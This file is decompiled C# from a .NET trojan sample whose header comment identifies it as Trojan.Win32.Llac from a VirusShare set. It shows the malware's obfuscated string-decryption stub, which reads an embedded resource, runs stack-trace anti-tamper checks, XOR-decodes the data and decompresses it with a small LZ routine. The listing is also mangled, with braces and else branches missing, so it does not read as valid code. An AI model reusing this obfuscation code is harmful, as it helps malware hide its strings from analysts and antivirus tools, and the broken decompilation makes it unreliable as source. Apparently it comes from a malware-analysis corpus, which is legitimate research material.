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192 lines
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// Decompiled with JetBrains decompiler
// Type:
// Assembly: Stub, Version=, Culture=neutral, PublicKeyToken=null
// MVID: 2229516C-329C-43F8-8C26-63983DECBF21
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u000E
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(20);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static int \u0006;
private static byte[] \u000E;
internal static string \u0002(int _param0)
lock (\u000E.\u0002)
string str1;
byte[] numArray1;
for (; !\u000E.\u0002.TryGetValue(_param0, out str1); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
if (\u000E.\u0003 == null)
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u000E.\u0006 = 1610370;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(" \u200B ");
int skipFrames = 1;
StackTrace stackTrace = new StackTrace(skipFrames, false);
\u000E.\u0006 ^= 6470 | skipFrames;
int index = skipFrames - 1;
StackFrame frame = stackTrace.GetFrame(index);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
\u000E.\u0006 ^= index + 128;
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
if (frame == null)
\u000E.\u0006 ^= 219315;
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
\u000E.\u0006 ^= 160;
if (!flag)
flag = (object) type == null;
if (flag)
\u000E.\u0006 ^= 219283;
if (flag == (stackTrace != null))
\u000E.\u0006 ^= 32;
\u000E.\u0006 ^= 6502 | index + 1;
\u000E.\u0003 = new BinaryReader(manifestResourceStream);
short count = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) -~~-~-~--~~13233);
if (count == (short) 0)
\u000E.\u0008 = (short) ((int) \u000E.\u0003.ReadInt16() ^ (int) (short) (-~-~~--~~-441539360 ^ 441548546));
\u000E.\u0005 = \u000E.\u0003.ReadBytes((int) count);
Assembly assembly = executingAssembly;
AssemblyName assemblyName;
assemblyName = assembly.GetName();
assemblyName = new AssemblyName(assembly.FullName);
\u000E.\u000E = assemblyName.GetPublicKeyToken();
if (\u000E.\u000E != null && \u000E.\u000E.Length == 0)
\u000E.\u000E = (byte[]) null;
\u000E.\u0006 = \u000E.\u0006 & 268435314 ^ 6788;
int num1 = _param0 ^ -374349416;
\u000E.\u0003.BaseStream.Position = (long) num1;
byte[] numArray2;
if (\u000E.\u0005 != null)
numArray2 = \u000E.\u0005;
short count = \u000E.\u0008 != (short) -1 ? \u000E.\u0008 : (short) ((int) \u000E.\u0003.ReadInt16() ^ 11876 ^ num1);
numArray2 = count != (short) 0 ? \u000E.\u0003.ReadBytes((int) count) : (byte[]) null;
int num2 = \u000E.\u0003.ReadInt32() ^ num1 ^ ~-~--~~-~-1793387753 ^ -1742585265;
if (num2 == -2)
numArray1 = \u000E.\u0003.ReadBytes(4);
_param0 = -221860183;
bool flag1 = (num2 & int.MinValue) != 0;
bool flag2 = (num2 & 1073741824) != 0;
int count = num2 & 1073741823;
byte[] numArray3 = \u000F.\u0002(numArray2, \u000E.\u0003.ReadBytes(count));
if (\u000E.\u000E != null != (\u000E.\u0006 != 1607814))
for (int index = 0; index < count; ++index)
byte num3 = \u000E.\u000E[index & 7];
byte num4 = (byte) ((int) num3 << 3 | (int) num3 >> 5);
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num4);
int num5 = \u000E.\u0006 - 12;
byte[] bytes;
int length;
if (!flag2)
bytes = numArray3;
length = count;
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
bytes = new byte[length];
\u000E.\u0002(numArray3, 4, bytes);
string str2;
if (flag1 && num5 == 1607802)
char[] chArray = new char[length];
for (int index = 0; index < length; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
int num6 = num5 + ((int) sbyte.MaxValue + (num5 & 3) << 5);
if (num6 != 1611930)
str2 = (_param0 + count ^ 936568 ^ num6 & 1293).ToString("X");
string str3 = string.Intern(str2);
\u000E.\u0002.Add(_param0, str3);
if (\u000E.\u0002.Count == 20)
\u000E.\u0003 = (BinaryReader) null;
\u000E.\u0005 = \u000E.\u000E = (byte[]) null;
return str3;
return str1;
private static int \u0002(byte[] _param0, int _param1, byte[] _param2)
int num1 = 0;
int num2 = 0;
int num3 = 128;
int length = _param2.Length;
while (num1 < length)
if ((num3 <<= 1) == 256)
num3 = 1;
num2 = (int) _param0[_param1++];
if ((num2 & num3) != 0)
int num4 = ((int) _param0[_param1] >> 2) + 3;
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
_param1 += 2;
int num6 = num1 - num5;
if (num6 < 0)
return -1;
while (true)
if (--num4 >= 0 && num1 < length)
_param2[num1++] = _param2[num6++];
goto label_9;
_param2[num1++] = _param0[_param1++];
return 0;